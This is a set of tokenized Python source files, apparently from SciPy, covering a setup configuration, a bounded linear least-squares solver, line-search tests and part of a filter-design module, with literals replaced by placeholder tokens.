<s> from __future__ import division , print_function , absolute_import <EOL> from numpy . distutils . core import setup <EOL> from numpy . distutils . misc_util import Configuration <EOL> from numpy import get_include <EOL> def configuration ( parent_package = '<STR_LIT>' , top_path = None ) : <EOL> config = Configuration ( '<STR_LIT>' , parent_package , top_path ) <EOL> config . add_extension ( "<STR_LIT>" , <EOL> sources = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] , <EOL> include_dirs = [ '<STR_LIT:src>' ] + [ get_include ( ) ] , <EOL> ) <EOL> config . add_extension ( "<STR_LIT>" , <EOL> sources = [ "<STR_LIT>" , ] , <EOL> include_dirs = [ '<STR_LIT:src>' ] + [ get_include ( ) ] , <EOL> ) <EOL> config . add_data_dir ( '<STR_LIT>' ) <EOL> return config <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setup ( ** configuration ( top_path = '<STR_LIT>' ) . todict ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import numpy as np <EOL> from numpy . linalg import norm <EOL> from scipy . linalg import qr , solve_triangular <EOL> from scipy . sparse . linalg import lsmr <EOL> from scipy . optimize import OptimizeResult <EOL> from . givens_elimination import givens_elimination <EOL> from . common import ( <EOL> EPS , step_size_to_bound , find_active_constraints , in_bounds , <EOL> make_strictly_feasible , build_quadratic_1d , evaluate_quadratic , <EOL> minimize_quadratic_1d , CL_scaling_vector , reflective_transformation , <EOL> print_header_linear , print_iteration_linear , compute_grad , <EOL> regularized_lsq_operator , right_multiplied_operator ) <EOL> def regularized_lsq_with_qr ( m , n , R , QTb , perm , diag , copy_R = True ) : <EOL> """<STR_LIT>""" <EOL> if copy_R : <EOL> R = R . copy ( ) <EOL> v = QTb . copy ( ) <EOL> givens_elimination ( R , v , diag [ perm ] ) <EOL> abs_diag_R = np . abs ( np . diag ( R ) ) <EOL> threshold = EPS * max ( m , n ) * np . max ( abs_diag_R ) <EOL> nns , = np . nonzero ( abs_diag_R > threshold ) <EOL> R = R [ np . ix_ ( nns , nns ) ] <EOL> v = v [ nns ] <EOL> x = np . zeros ( n ) <EOL> x [ perm [ nns ] ] = solve_triangular ( R , v ) <EOL> return x <EOL> def backtracking ( A , g , x , p , theta , p_dot_g , lb , ub ) : <EOL> """<STR_LIT>""" <EOL> alpha = <NUM_LIT:1> <EOL> while True : <EOL> x_new , _ = reflective_transformation ( x + alpha * p , lb , ub ) <EOL> step = x_new - x <EOL> cost_change = - evaluate_quadratic ( A , g , step ) <EOL> if cost_change > - <NUM_LIT:0.1> * alpha * p_dot_g : <EOL> break <EOL> active = find_active_constraints ( x_new , lb , ub ) <EOL> if np . 
any ( active != <NUM_LIT:0> ) : <EOL> x_new , _ = reflective_transformation ( x + theta * alpha * p , lb , ub ) <EOL> x_new = make_strictly_feasible ( x_new , lb , ub , rstep = <NUM_LIT:0> ) <EOL> step = x_new - x <EOL> cost_change = - evaluate_quadratic ( A , g , step ) <EOL> return x , step , cost_change <EOL> def select_step ( x , A_h , g_h , c_h , p , p_h , d , lb , ub , theta ) : <EOL> """<STR_LIT>""" <EOL> if in_bounds ( x + p , lb , ub ) : <EOL> return p <EOL> p_stride , hits = step_size_to_bound ( x , p , lb , ub ) <EOL> r_h = np . copy ( p_h ) <EOL> r_h [ hits . astype ( bool ) ] *= - <NUM_LIT:1> <EOL> r = d * r_h <EOL> p *= p_stride <EOL> p_h *= p_stride <EOL> x_on_bound = x + p <EOL> r_stride_u , _ = step_size_to_bound ( x_on_bound , r , lb , ub ) <EOL> r_stride_l = ( <NUM_LIT:1> - theta ) * r_stride_u <EOL> r_stride_u *= theta <EOL> if r_stride_u > <NUM_LIT:0> : <EOL> a , b , c = build_quadratic_1d ( A_h , g_h , r_h , s0 = p_h , diag = c_h ) <EOL> r_stride , r_value = minimize_quadratic_1d ( <EOL> a , b , r_stride_l , r_stride_u , c = c ) <EOL> r_h = p_h + r_h * r_stride <EOL> r = d * r_h <EOL> else : <EOL> r_value = np . inf <EOL> p_h *= theta <EOL> p *= theta <EOL> p_value = evaluate_quadratic ( A_h , g_h , p_h , diag = c_h ) <EOL> ag_h = - g_h <EOL> ag = d * ag_h <EOL> ag_stride_u , _ = step_size_to_bound ( x , ag , lb , ub ) <EOL> ag_stride_u *= theta <EOL> a , b = build_quadratic_1d ( A_h , g_h , ag_h , diag = c_h ) <EOL> ag_stride , ag_value = minimize_quadratic_1d ( a , b , <NUM_LIT:0> , ag_stride_u ) <EOL> ag *= ag_stride <EOL> if p_value < r_value and p_value < ag_value : <EOL> return p <EOL> elif r_value < p_value and r_value < ag_value : <EOL> return r <EOL> else : <EOL> return ag <EOL> def trf_linear ( A , b , x_lsq , lb , ub , tol , lsq_solver , lsmr_tol , max_iter , <EOL> verbose ) : <EOL> m , n = A . 
shape <EOL> x , _ = reflective_transformation ( x_lsq , lb , ub ) <EOL> x = make_strictly_feasible ( x , lb , ub , rstep = <NUM_LIT:0.1> ) <EOL> if lsq_solver == '<STR_LIT>' : <EOL> QT , R , perm = qr ( A , mode = '<STR_LIT>' , pivoting = True ) <EOL> QT = QT . T <EOL> if m < n : <EOL> R = np . vstack ( ( R , np . zeros ( ( n - m , n ) ) ) ) <EOL> QTr = np . zeros ( n ) <EOL> k = min ( m , n ) <EOL> elif lsq_solver == '<STR_LIT>' : <EOL> r_aug = np . zeros ( m + n ) <EOL> auto_lsmr_tol = False <EOL> if lsmr_tol is None : <EOL> lsmr_tol = <NUM_LIT> * tol <EOL> elif lsmr_tol == '<STR_LIT>' : <EOL> auto_lsmr_tol = True <EOL> r = A . dot ( x ) - b <EOL> g = compute_grad ( A , r ) <EOL> cost = <NUM_LIT:0.5> * np . dot ( r , r ) <EOL> initial_cost = cost <EOL> termination_status = None <EOL> step_norm = None <EOL> cost_change = None <EOL> if max_iter is None : <EOL> max_iter = <NUM_LIT:100> <EOL> if verbose == <NUM_LIT:2> : <EOL> print_header_linear ( ) <EOL> for iteration in range ( max_iter ) : <EOL> v , dv = CL_scaling_vector ( x , g , lb , ub ) <EOL> g_scaled = g * v <EOL> g_norm = norm ( g_scaled , ord = np . inf ) <EOL> if g_norm < tol : <EOL> termination_status = <NUM_LIT:1> <EOL> if verbose == <NUM_LIT:2> : <EOL> print_iteration_linear ( iteration , cost , cost_change , <EOL> step_norm , g_norm ) <EOL> if termination_status is not None : <EOL> break <EOL> diag_h = g * dv <EOL> diag_root_h = diag_h ** <NUM_LIT:0.5> <EOL> d = v ** <NUM_LIT:0.5> <EOL> g_h = d * g <EOL> A_h = right_multiplied_operator ( A , d ) <EOL> if lsq_solver == '<STR_LIT>' : <EOL> QTr [ : k ] = QT . 
dot ( r ) <EOL> p_h = - regularized_lsq_with_qr ( m , n , R * d [ perm ] , QTr , perm , <EOL> diag_root_h , copy_R = False ) <EOL> elif lsq_solver == '<STR_LIT>' : <EOL> lsmr_op = regularized_lsq_operator ( A_h , diag_root_h ) <EOL> r_aug [ : m ] = r <EOL> if auto_lsmr_tol : <EOL> eta = <NUM_LIT> * min ( <NUM_LIT:0.5> , g_norm ) <EOL> lsmr_tol = max ( EPS , min ( <NUM_LIT:0.1> , eta * g_norm ) ) <EOL> p_h = - lsmr ( lsmr_op , r_aug , atol = lsmr_tol , btol = lsmr_tol ) [ <NUM_LIT:0> ] <EOL> p = d * p_h <EOL> p_dot_g = np . dot ( p , g ) <EOL> if p_dot_g > <NUM_LIT:0> : <EOL> termination_status = - <NUM_LIT:1> <EOL> theta = <NUM_LIT:1> - min ( <NUM_LIT> , g_norm ) <EOL> step = select_step ( x , A_h , g_h , diag_h , p , p_h , d , lb , ub , theta ) <EOL> cost_change = - evaluate_quadratic ( A , g , step ) <EOL> if cost_change < <NUM_LIT:0> : <EOL> x , step , cost_change = backtracking ( <EOL> A , g , x , p , theta , p_dot_g , lb , ub ) <EOL> else : <EOL> x = make_strictly_feasible ( x + step , lb , ub , rstep = <NUM_LIT:0> ) <EOL> step_norm = norm ( step ) <EOL> r = A . dot ( x ) - b <EOL> g = compute_grad ( A , r ) <EOL> if cost_change < tol * cost : <EOL> termination_status = <NUM_LIT:2> <EOL> cost = <NUM_LIT:0.5> * np . dot ( r , r ) <EOL> if termination_status is None : <EOL> termination_status = <NUM_LIT:0> <EOL> active_mask = find_active_constraints ( x , lb , ub , rtol = tol ) <EOL> return OptimizeResult ( <EOL> x = x , fun = r , cost = cost , optimality = g_norm , active_mask = active_mask , <EOL> nit = iteration + <NUM_LIT:1> , status = termination_status , <EOL> initial_cost = initial_cost ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> from numpy . testing import assert_ , assert_equal , assert_array_almost_equal , assert_array_almost_equal_nulp <EOL> import scipy . optimize . linesearch as ls <EOL> from scipy . optimize . linesearch import LineSearchWarning <EOL> import numpy as np <EOL> def assert_wolfe ( s , phi , derphi , c1 = <NUM_LIT> , c2 = <NUM_LIT> , err_msg = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> phi1 = phi ( s ) <EOL> phi0 = phi ( <NUM_LIT:0> ) <EOL> derphi0 = derphi ( <NUM_LIT:0> ) <EOL> derphi1 = derphi ( s ) <EOL> msg = "<STR_LIT>" % ( <EOL> s , phi0 , phi1 , derphi0 , derphi1 , err_msg ) <EOL> assert_ ( phi1 <= phi0 + c1 * s * derphi0 , "<STR_LIT>" + msg ) <EOL> assert_ ( abs ( derphi1 ) <= abs ( c2 * derphi0 ) , "<STR_LIT>" + msg ) <EOL> def assert_armijo ( s , phi , c1 = <NUM_LIT> , err_msg = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> phi1 = phi ( s ) <EOL> phi0 = phi ( <NUM_LIT:0> ) <EOL> msg = "<STR_LIT>" % ( s , phi0 , phi1 , err_msg ) <EOL> assert_ ( phi1 <= ( <NUM_LIT:1> - c1 * s ) * phi0 , msg ) <EOL> def assert_line_wolfe ( x , p , s , f , fprime , ** kw ) : <EOL> assert_wolfe ( s , phi = lambda sp : f ( x + p * sp ) , <EOL> derphi = lambda sp : np . dot ( fprime ( x + p * sp ) , p ) , ** kw ) <EOL> def assert_line_armijo ( x , p , s , f , ** kw ) : <EOL> assert_armijo ( s , phi = lambda sp : f ( x + p * sp ) , ** kw ) <EOL> def assert_fp_equal ( x , y , err_msg = "<STR_LIT>" , nulp = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> assert_array_almost_equal_nulp ( x , y , nulp ) <EOL> except AssertionError as e : <EOL> raise AssertionError ( "<STR_LIT>" % ( e , err_msg ) ) <EOL> class TestLineSearch ( object ) : <EOL> def _scalar_func_1 ( self , s ) : <EOL> self . 
fcount += <NUM_LIT:1> <EOL> p = - s - s ** <NUM_LIT:3> + s ** <NUM_LIT:4> <EOL> dp = - <NUM_LIT:1> - <NUM_LIT:3> * s ** <NUM_LIT:2> + <NUM_LIT:4> * s ** <NUM_LIT:3> <EOL> return p , dp <EOL> def _scalar_func_2 ( self , s ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> p = np . exp ( - <NUM_LIT:4> * s ) + s ** <NUM_LIT:2> <EOL> dp = - <NUM_LIT:4> * np . exp ( - <NUM_LIT:4> * s ) + <NUM_LIT:2> * s <EOL> return p , dp <EOL> def _scalar_func_3 ( self , s ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> p = - np . sin ( <NUM_LIT:10> * s ) <EOL> dp = - <NUM_LIT:10> * np . cos ( <NUM_LIT:10> * s ) <EOL> return p , dp <EOL> def _line_func_1 ( self , x ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> f = np . dot ( x , x ) <EOL> df = <NUM_LIT:2> * x <EOL> return f , df <EOL> def _line_func_2 ( self , x ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> f = np . dot ( x , np . dot ( self . A , x ) ) + <NUM_LIT:1> <EOL> df = np . dot ( self . A + self . A . T , x ) <EOL> return f , df <EOL> def __init__ ( self ) : <EOL> self . scalar_funcs = [ ] <EOL> self . line_funcs = [ ] <EOL> self . N = <NUM_LIT:20> <EOL> self . fcount = <NUM_LIT:0> <EOL> def bind_index ( func , idx ) : <EOL> return lambda * a , ** kw : func ( * a , ** kw ) [ idx ] <EOL> for name in sorted ( dir ( self ) ) : <EOL> if name . startswith ( '<STR_LIT>' ) : <EOL> value = getattr ( self , name ) <EOL> self . scalar_funcs . append ( <EOL> ( name , bind_index ( value , <NUM_LIT:0> ) , bind_index ( value , <NUM_LIT:1> ) ) ) <EOL> elif name . startswith ( '<STR_LIT>' ) : <EOL> value = getattr ( self , name ) <EOL> self . line_funcs . append ( <EOL> ( name , bind_index ( value , <NUM_LIT:0> ) , bind_index ( value , <NUM_LIT:1> ) ) ) <EOL> def setUp ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> self . A = np . random . randn ( self . N , self . N ) <EOL> def scalar_iter ( self ) : <EOL> for name , phi , derphi in self . scalar_funcs : <EOL> for old_phi0 in np . random . 
randn ( <NUM_LIT:3> ) : <EOL> yield name , phi , derphi , old_phi0 <EOL> def line_iter ( self ) : <EOL> for name , f , fprime in self . line_funcs : <EOL> k = <NUM_LIT:0> <EOL> while k < <NUM_LIT:9> : <EOL> x = np . random . randn ( self . N ) <EOL> p = np . random . randn ( self . N ) <EOL> if np . dot ( p , fprime ( x ) ) >= <NUM_LIT:0> : <EOL> continue <EOL> k += <NUM_LIT:1> <EOL> old_fv = float ( np . random . randn ( ) ) <EOL> yield name , f , fprime , x , p , old_fv <EOL> def test_scalar_search_wolfe1 ( self ) : <EOL> c = <NUM_LIT:0> <EOL> for name , phi , derphi , old_phi0 in self . scalar_iter ( ) : <EOL> c += <NUM_LIT:1> <EOL> s , phi1 , phi0 = ls . scalar_search_wolfe1 ( phi , derphi , phi ( <NUM_LIT:0> ) , <EOL> old_phi0 , derphi ( <NUM_LIT:0> ) ) <EOL> assert_fp_equal ( phi0 , phi ( <NUM_LIT:0> ) , name ) <EOL> assert_fp_equal ( phi1 , phi ( s ) , name ) <EOL> assert_wolfe ( s , phi , derphi , err_msg = name ) <EOL> assert_ ( c > <NUM_LIT:3> ) <EOL> def test_scalar_search_wolfe2 ( self ) : <EOL> for name , phi , derphi , old_phi0 in self . scalar_iter ( ) : <EOL> s , phi1 , phi0 , derphi1 = ls . scalar_search_wolfe2 ( <EOL> phi , derphi , phi ( <NUM_LIT:0> ) , old_phi0 , derphi ( <NUM_LIT:0> ) ) <EOL> assert_fp_equal ( phi0 , phi ( <NUM_LIT:0> ) , name ) <EOL> assert_fp_equal ( phi1 , phi ( s ) , name ) <EOL> if derphi1 is not None : <EOL> assert_fp_equal ( derphi1 , derphi ( s ) , name ) <EOL> assert_wolfe ( s , phi , derphi , err_msg = "<STR_LIT>" % ( name , old_phi0 ) ) <EOL> def test_scalar_search_armijo ( self ) : <EOL> for name , phi , derphi , old_phi0 in self . scalar_iter ( ) : <EOL> s , phi1 = ls . scalar_search_armijo ( phi , phi ( <NUM_LIT:0> ) , derphi ( <NUM_LIT:0> ) ) <EOL> assert_fp_equal ( phi1 , phi ( s ) , name ) <EOL> assert_armijo ( s , phi , err_msg = "<STR_LIT>" % ( name , old_phi0 ) ) <EOL> def test_line_search_wolfe1 ( self ) : <EOL> c = <NUM_LIT:0> <EOL> smax = <NUM_LIT:100> <EOL> for name , f , fprime , x , p , old_f in self . 
line_iter ( ) : <EOL> f0 = f ( x ) <EOL> g0 = fprime ( x ) <EOL> self . fcount = <NUM_LIT:0> <EOL> s , fc , gc , fv , ofv , gv = ls . line_search_wolfe1 ( f , fprime , x , p , <EOL> g0 , f0 , old_f , <EOL> amax = smax ) <EOL> assert_equal ( self . fcount , fc + gc ) <EOL> assert_fp_equal ( ofv , f ( x ) ) <EOL> if s is None : <EOL> continue <EOL> assert_fp_equal ( fv , f ( x + s * p ) ) <EOL> assert_array_almost_equal ( gv , fprime ( x + s * p ) , decimal = <NUM_LIT> ) <EOL> if s < smax : <EOL> c += <NUM_LIT:1> <EOL> assert_line_wolfe ( x , p , s , f , fprime , err_msg = name ) <EOL> assert_ ( c > <NUM_LIT:3> ) <EOL> def test_line_search_wolfe2 ( self ) : <EOL> c = <NUM_LIT:0> <EOL> smax = <NUM_LIT:100> <EOL> for name , f , fprime , x , p , old_f in self . line_iter ( ) : <EOL> f0 = f ( x ) <EOL> g0 = fprime ( x ) <EOL> self . fcount = <NUM_LIT:0> <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' , LineSearchWarning ) <EOL> s , fc , gc , fv , ofv , gv = ls . line_search_wolfe2 ( f , fprime , x , p , <EOL> g0 , f0 , old_f , <EOL> amax = smax ) <EOL> assert_equal ( self . fcount , fc + gc ) <EOL> assert_fp_equal ( ofv , f ( x ) ) <EOL> assert_fp_equal ( fv , f ( x + s * p ) ) <EOL> if gv is not None : <EOL> assert_array_almost_equal ( gv , fprime ( x + s * p ) , decimal = <NUM_LIT> ) <EOL> if s < smax : <EOL> c += <NUM_LIT:1> <EOL> assert_line_wolfe ( x , p , s , f , fprime , err_msg = name ) <EOL> assert_ ( c > <NUM_LIT:3> ) <EOL> def test_line_search_armijo ( self ) : <EOL> c = <NUM_LIT:0> <EOL> for name , f , fprime , x , p , old_f in self . line_iter ( ) : <EOL> f0 = f ( x ) <EOL> g0 = fprime ( x ) <EOL> self . fcount = <NUM_LIT:0> <EOL> s , fc , fv = ls . line_search_armijo ( f , x , p , g0 , f0 ) <EOL> c += <NUM_LIT:1> <EOL> assert_equal ( self . 
fcount , fc ) <EOL> assert_fp_equal ( fv , f ( x + s * p ) ) <EOL> assert_line_armijo ( x , p , s , f , err_msg = name ) <EOL> assert_ ( c >= <NUM_LIT:9> ) <EOL> def test_armijo_terminate_1 ( self ) : <EOL> count = [ <NUM_LIT:0> ] <EOL> def phi ( s ) : <EOL> count [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return - s + <NUM_LIT> * s ** <NUM_LIT:2> <EOL> s , phi1 = ls . scalar_search_armijo ( phi , phi ( <NUM_LIT:0> ) , - <NUM_LIT:1> , alpha0 = <NUM_LIT:1> ) <EOL> assert_equal ( s , <NUM_LIT:1> ) <EOL> assert_equal ( count [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> assert_armijo ( s , phi ) <EOL> def test_wolfe_terminate ( self ) : <EOL> def phi ( s ) : <EOL> count [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return - s + <NUM_LIT> * s ** <NUM_LIT:2> <EOL> def derphi ( s ) : <EOL> count [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return - <NUM_LIT:1> + <NUM_LIT> * <NUM_LIT:2> * s <EOL> for func in [ ls . scalar_search_wolfe1 , ls . scalar_search_wolfe2 ] : <EOL> count = [ <NUM_LIT:0> ] <EOL> r = func ( phi , derphi , phi ( <NUM_LIT:0> ) , None , derphi ( <NUM_LIT:0> ) ) <EOL> assert_ ( r [ <NUM_LIT:0> ] is not None , ( r , func ) ) <EOL> assert_ ( count [ <NUM_LIT:0> ] <= <NUM_LIT:2> + <NUM_LIT:2> , ( count , func ) ) <EOL> assert_wolfe ( r [ <NUM_LIT:0> ] , phi , derphi , err_msg = str ( func ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> import numpy <EOL> from numpy import ( atleast_1d , poly , polyval , roots , real , asarray , allclose , <EOL> resize , pi , absolute , logspace , r_ , sqrt , tan , log10 , <EOL> arctan , arcsinh , sin , exp , cosh , arccosh , ceil , conjugate , <EOL> zeros , sinh , append , concatenate , prod , ones , array ) <EOL> from numpy import mintypecode <EOL> import numpy as np <EOL> from scipy import special , optimize <EOL> from scipy . special import comb <EOL> from scipy . misc import factorial <EOL> from numpy . polynomial . polynomial import polyval as npp_polyval <EOL> import math <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class BadCoefficients ( UserWarning ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> abs = absolute <EOL> def findfreqs ( num , den , N ) : <EOL> """<STR_LIT>""" <EOL> ep = atleast_1d ( roots ( den ) ) + <NUM_LIT> <EOL> tz = atleast_1d ( roots ( num ) ) + <NUM_LIT> <EOL> if len ( ep ) == <NUM_LIT:0> : <EOL> ep = atleast_1d ( - <NUM_LIT:1000> ) + <NUM_LIT> <EOL> ez = r_ [ '<STR_LIT>' , <EOL> numpy . compress ( ep . imag >= <NUM_LIT:0> , ep , axis = - <NUM_LIT:1> ) , <EOL> numpy . compress ( ( abs ( tz ) < <NUM_LIT> ) & ( tz . imag >= <NUM_LIT:0> ) , tz , axis = - <NUM_LIT:1> ) ] <EOL> integ = abs ( ez ) < <NUM_LIT> <EOL> hfreq = numpy . around ( numpy . log10 ( numpy . max ( <NUM_LIT:3> * abs ( ez . real + integ ) + <EOL> <NUM_LIT> * ez . 
imag ) ) + <NUM_LIT:0.5> ) <EOL> lfreq = numpy . around ( numpy . log10 ( <NUM_LIT:0.1> * numpy . min ( abs ( real ( ez + integ ) ) + <EOL> <NUM_LIT:2> * ez . imag ) ) - <NUM_LIT:0.5> ) <EOL> w = logspace ( lfreq , hfreq , N ) <EOL> return w <EOL> def freqs ( b , a , worN = None , plot = None ) : <EOL> """<STR_LIT>""" <EOL> if worN is None : <EOL> w = findfreqs ( b , a , <NUM_LIT:200> ) <EOL> elif isinstance ( worN , int ) : <EOL> N = worN <EOL> w = findfreqs ( b , a , N ) <EOL> else : <EOL> w = worN <EOL> w = atleast_1d ( w ) <EOL> s = <NUM_LIT> * w <EOL> h = polyval ( b , s ) / polyval ( a , s ) <EOL> if plot is not None : <EOL> plot ( w , h ) <EOL> return w , h <EOL> def freqz ( b , a = <NUM_LIT:1> , worN = None , whole = False , plot = None ) : <EOL> """<STR_LIT>""" <EOL> b , a = map ( atleast_1d , ( b , a ) ) <EOL> if whole : <EOL> lastpoint = <NUM_LIT:2> * pi <EOL> else : <EOL> lastpoint = pi <EOL> if worN is None : <EOL> N = <NUM_LIT> <EOL> w = numpy . linspace ( <NUM_LIT:0> , lastpoint , N , endpoint = False ) <EOL> elif isinstance ( worN , int ) : <EOL> N = worN <EOL> w = numpy . linspace ( <NUM_LIT:0> , lastpoint , N , endpoint = False ) <EOL> else : <EOL> w = worN <EOL> w = atleast_1d ( w ) <EOL> zm1 = exp ( - <NUM_LIT> * w ) <EOL> h = polyval ( b [ : : - <NUM_LIT:1> ] , zm1 ) / polyval ( a [ : : - <NUM_LIT:1> ] , zm1 ) <EOL> if plot is not None : <EOL> plot ( w , h ) <EOL> return w , h <EOL> def group_delay ( system , w = None , whole = False ) : <EOL> r"""<STR_LIT>""" <EOL> if w is None : <EOL> w = <NUM_LIT> <EOL> if isinstance ( w , int ) : <EOL> if whole : <EOL> w = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> * pi , w , endpoint = False ) <EOL> else : <EOL> w = np . linspace ( <NUM_LIT:0> , pi , w , endpoint = False ) <EOL> w = np . atleast_1d ( w ) <EOL> b , a = map ( np . atleast_1d , system ) <EOL> c = np . convolve ( b , a [ : : - <NUM_LIT:1> ] ) <EOL> cr = c * np . arange ( c . size ) <EOL> z = np . exp ( - <NUM_LIT> * w ) <EOL> num = np . 
polyval ( cr [ : : - <NUM_LIT:1> ] , z ) <EOL> den = np . polyval ( c [ : : - <NUM_LIT:1> ] , z ) <EOL> singular = np . absolute ( den ) < <NUM_LIT:10> * EPSILON <EOL> if np . any ( singular ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" . <EOL> format ( "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" . format ( ws ) for ws in w [ singular ] ) ) <EOL> ) <EOL> gd = np . zeros_like ( w ) <EOL> gd [ ~ singular ] = np . real ( num [ ~ singular ] / den [ ~ singular ] ) - a . size + <NUM_LIT:1> <EOL> return w , gd <EOL> def _cplxreal ( z , tol = None ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> if z . size == <NUM_LIT:0> : <EOL> return z , z <EOL> elif z . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if tol is None : <EOL> tol = <NUM_LIT:100> * np . finfo ( ( <NUM_LIT:1.0> * z ) . dtype ) . eps <EOL> z = z [ np . lexsort ( ( abs ( z . imag ) , z . real ) ) ] <EOL> real_indices = abs ( z . imag ) <= tol * abs ( z ) <EOL> zr = z [ real_indices ] . real <EOL> if len ( zr ) == len ( z ) : <EOL> return array ( [ ] ) , zr <EOL> z = z [ ~ real_indices ] <EOL> zp = z [ z . imag > <NUM_LIT:0> ] <EOL> zn = z [ z . imag < <NUM_LIT:0> ] <EOL> if len ( zp ) != len ( zn ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> same_real = np . diff ( zp . real ) <= tol * abs ( zp [ : - <NUM_LIT:1> ] ) <EOL> diffs = numpy . diff ( concatenate ( ( [ <NUM_LIT:0> ] , same_real , [ <NUM_LIT:0> ] ) ) ) <EOL> run_starts = numpy . where ( diffs > <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> run_stops = numpy . where ( diffs < <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> for i in range ( len ( run_starts ) ) : <EOL> start = run_starts [ i ] <EOL> stop = run_stops [ i ] + <NUM_LIT:1> <EOL> for chunk in ( zp [ start : stop ] , zn [ start : stop ] ) : <EOL> chunk [ ... ] = chunk [ np . lexsort ( [ abs ( chunk . imag ) ] ) ] <EOL> if any ( abs ( zp - zn . conj ( ) ) > tol * abs ( zn ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> zc = ( zp + zn . 
conj ( ) ) / <NUM_LIT:2> <EOL> return zc , zr <EOL> def _cplxpair ( z , tol = None ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> if z . size == <NUM_LIT:0> or np . isrealobj ( z ) : <EOL> return np . sort ( z ) <EOL> if z . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> zc , zr = _cplxreal ( z , tol ) <EOL> zc = np . dstack ( ( zc . conj ( ) , zc ) ) . flatten ( ) <EOL> z = np . append ( zc , zr ) <EOL> return z <EOL> def tf2zpk ( b , a ) : <EOL> r"""<STR_LIT>""" <EOL> b , a = normalize ( b , a ) <EOL> b = ( b + <NUM_LIT:0.0> ) / a [ <NUM_LIT:0> ] <EOL> a = ( a + <NUM_LIT:0.0> ) / a [ <NUM_LIT:0> ] <EOL> k = b [ <NUM_LIT:0> ] <EOL> b /= b [ <NUM_LIT:0> ] <EOL> z = roots ( b ) <EOL> p = roots ( a ) <EOL> return z , p , k <EOL> def zpk2tf ( z , p , k ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> k = atleast_1d ( k ) <EOL> if len ( z . shape ) > <NUM_LIT:1> : <EOL> temp = poly ( z [ <NUM_LIT:0> ] ) <EOL> b = zeros ( ( z . shape [ <NUM_LIT:0> ] , z . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> ) , temp . dtype . char ) <EOL> if len ( k ) == <NUM_LIT:1> : <EOL> k = [ k [ <NUM_LIT:0> ] ] * z . shape [ <NUM_LIT:0> ] <EOL> for i in range ( z . shape [ <NUM_LIT:0> ] ) : <EOL> b [ i ] = k [ i ] * poly ( z [ i ] ) <EOL> else : <EOL> b = k * poly ( z ) <EOL> a = atleast_1d ( poly ( p ) ) <EOL> if issubclass ( b . dtype . type , numpy . complexfloating ) : <EOL> roots = numpy . asarray ( z , complex ) <EOL> pos_roots = numpy . compress ( roots . imag > <NUM_LIT:0> , roots ) <EOL> neg_roots = numpy . conjugate ( numpy . compress ( roots . imag < <NUM_LIT:0> , roots ) ) <EOL> if len ( pos_roots ) == len ( neg_roots ) : <EOL> if numpy . all ( numpy . sort_complex ( neg_roots ) == <EOL> numpy . sort_complex ( pos_roots ) ) : <EOL> b = b . real . copy ( ) <EOL> if issubclass ( a . dtype . type , numpy . complexfloating ) : <EOL> roots = numpy . asarray ( p , complex ) <EOL> pos_roots = numpy . compress ( roots . 
